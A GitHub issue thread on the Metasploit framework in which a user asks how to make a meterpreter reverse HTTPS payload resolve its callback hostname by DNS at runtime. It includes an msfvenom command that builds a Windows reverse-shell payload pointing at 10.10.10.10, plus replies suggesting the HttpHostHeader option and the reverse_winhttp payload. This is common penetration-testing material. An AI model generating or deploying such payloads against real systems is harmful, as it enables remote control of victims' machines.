### ISSUE TITLE
payload with lhost dns query?

### ISSUE THREAD

**Issue by T35R6braPwgDJKq** [rapid7/metasploit-framework#14954]
I need to create a payload that requests DNS instead of hardcoding IP addresses.
From my understanding, setting a hostname in LHOST just resolves the hostname at generation time.
I was not able "to wireshark" DNS requests for a payload like:

```
msfvenom -p windows/meterpreter_reverse_https LHOST=10.10.10.10 LPORT=443 OverrideLHOST=mydnsname.com overrrideLPORT=443 OverrideRequestHost=true 
```
However I think if I'd add the mydnsname.com to the hosts file, it would work; so is there any DNS option?

**Comment by DarkRed777** [comment]
Have you tried setting: HttpHostHeader  ?
IMO this will send "Host: mydnsname.com" to 10.10.10.10 on each request. 

```
   HttpHostHeader                                                            no        An optional value to use for the Host HTTP header

```

**Comment by T35R6braPwgDJKq** [comment]
No I did not. But it defeats the purpose.
Fact is, the IP is not determined at generation time and must be resolved at runtime.

**Comment by T35R6braPwgDJKq** [comment]
So nothing?!

**Comment by timwr** [comment]
@T35R6braPwgDJKq I suspect the windows/meterpreter/reverse_winhttp (and windows/x64/meterpreter/reverse_winhttp) payload might solve this for you?
